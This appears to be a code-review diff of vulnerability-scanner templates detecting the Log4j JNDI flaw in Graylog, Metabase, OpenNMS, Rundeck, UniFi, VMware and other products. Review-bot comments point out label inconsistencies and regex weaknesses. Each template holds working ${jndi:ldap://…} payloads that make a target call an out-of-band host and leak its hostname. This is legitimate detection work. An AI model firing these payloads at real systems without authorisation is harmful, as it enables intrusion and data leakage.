- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: regex - type: regex
@ -61,10 +65,16 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs 2022/10/10 # Enhanced by cs 2022/10/10
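Review bot: The rewritten POST body still carries `formPanel%3AloginGrid%3Avalue={{view}}}` with three closing braces, so a literal `}` is sent after the extracted view state. It predates this commit, but the line was edited here, and the later `javax.faces.ViewState={{view}}` on the same line is balanced, which suggests a typo. If so, the fix is `formPanel%3AloginGrid%3Avalue={{view}}`. Whether the server tolerates the extra character cannot be judged from this page.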


@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -32,7 +36,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}} Referer: {{BaseURL}}
{"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -44,7 +48,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: header part: header
@ -56,10 +60,16 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23 # Enhanced by md on 2023/03/23


@ -20,10 +20,14 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}" - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -35,7 +39,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: body part: body
@ -47,8 +51,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -22,6 +22,10 @@ info:
verified: "true" verified: "true"
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -29,7 +33,7 @@ http:
Referer: {{RootURL}}/opennms/login.jsp Referer: {{RootURL}}/opennms/login.jsp
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -41,17 +45,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs on 2022/10/23 # Enhanced by cs on 2022/10/23
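Review bot: The injection-point label is `postdata` here although the payload sits in `j_username`; the Jamf, Cisco and MobileIron templates in this commit label the same kind of field `username`. Since the `group: 2` extractor prints this label, equivalent findings will read differently across templates. I would use `.${hostName}.username.{{interactsh-url}}` here, and likewise in the Rundeck template. The UniFi template labels its `remember` field `postdata` as well.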


@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -30,7 +34,7 @@ http:
Connection: close Connection: close
Referer: {{BaseURL}}/user/login Referer: {{BaseURL}}/user/login
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -42,7 +46,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: location part: location
@ -54,8 +58,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -22,6 +22,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -31,7 +35,7 @@ http:
Origin: {{RootURL}} Origin: {{RootURL}}
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true} {"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -43,13 +47,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/06/03 # Enhanced by mp on 2022/06/03
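Review bot: The extractor groups only line up when `{{interactsh-url}}` expands to exactly three DNS labels, because the pattern fixes four labels after the greedy `([a-zA-Z0-9\.\-]+)`. Only in that case is group 1 the `${hostName}` value and group 2 the injection point. With a callback domain of a different depth (for example a self-hosted server, which I am assuming is possible here), group 1 would absorb extra labels and the "injection point" output would show the wrong field, which misleads triage. Since the pattern is repeated in every template of this commit, a comment stating the assumption would help: `# assumes {{interactsh-url}} is <id>.<domain>.<tld>; capture groups shift otherwise`.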


@ -21,10 +21,14 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D' - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -36,7 +40,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: body part: body
@ -48,8 +52,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
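Review bot: The matcher accepts any six digits before a dot (`\d{6}\.`) rather than the values actually sent as `{{rand1}}{{rand2}}`, and the pattern is unanchored. The marker is therefore only shape-checked and adds little assurance that the callback came from this request's evaluated lookup. If the engine expands template variables inside matcher values (worth confirming for the version this repository targets), an additional `word` matcher on `interactsh_request` with `words: ['{{rand1}}{{rand2}}.']` would tie the finding to the generated marker. Failing that, a comment noting that the digits are not compared with the generated values would keep readers from over-trusting the result. The other templates in this commit share the pattern.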


@ -11,6 +11,10 @@ info:
shodan-query: title:"XenMobile" shodan-query: title:"XenMobile"
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -23,7 +27,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -35,7 +39,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: body part: body
@ -47,8 +51,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
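Review bot: The injection-point label is `postdata` here for the `login` form field (and for `j_username` in the Rundeck section earlier on this page), while the sections that follow use `username` for the same kind of field. Because the label is what the new `group: 2` extractor prints, naming the parameter consistently makes scan output easier to compare across products. Using `.login.` here would still satisfy the `([a-z0-9]+)` label pattern.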


@ -20,12 +20,16 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}} X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -37,17 +41,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/31 # Enhanced by mp on 2022/05/31


@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -32,7 +36,7 @@ http:
{ {
"authType": "password", "authType": "password",
"username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}", "username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}",
"password": "admin" "password": "admin"
} }
@ -46,16 +50,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/05 # Enhanced by md on 2022/10/05


@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}}/login.jsp Referer: {{BaseURL}}/login.jsp
username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit= username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit=
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -42,7 +46,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: location part: location
@ -54,8 +58,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -33,7 +37,7 @@ http:
Sec-Fetch-Mode: cors Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin Sec-Fetch-Site: same-origin
mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -45,7 +49,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: header part: header
@ -57,8 +61,14 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output


@ -23,6 +23,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -32,7 +36,7 @@ http:
Origin: {{RootURL}} Origin: {{RootURL}}
Referer: {{RootURL}}/ui/ Referer: {{RootURL}}/ui/
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"} {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -44,13 +48,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/04/05 # Enhanced by mp on 2022/04/05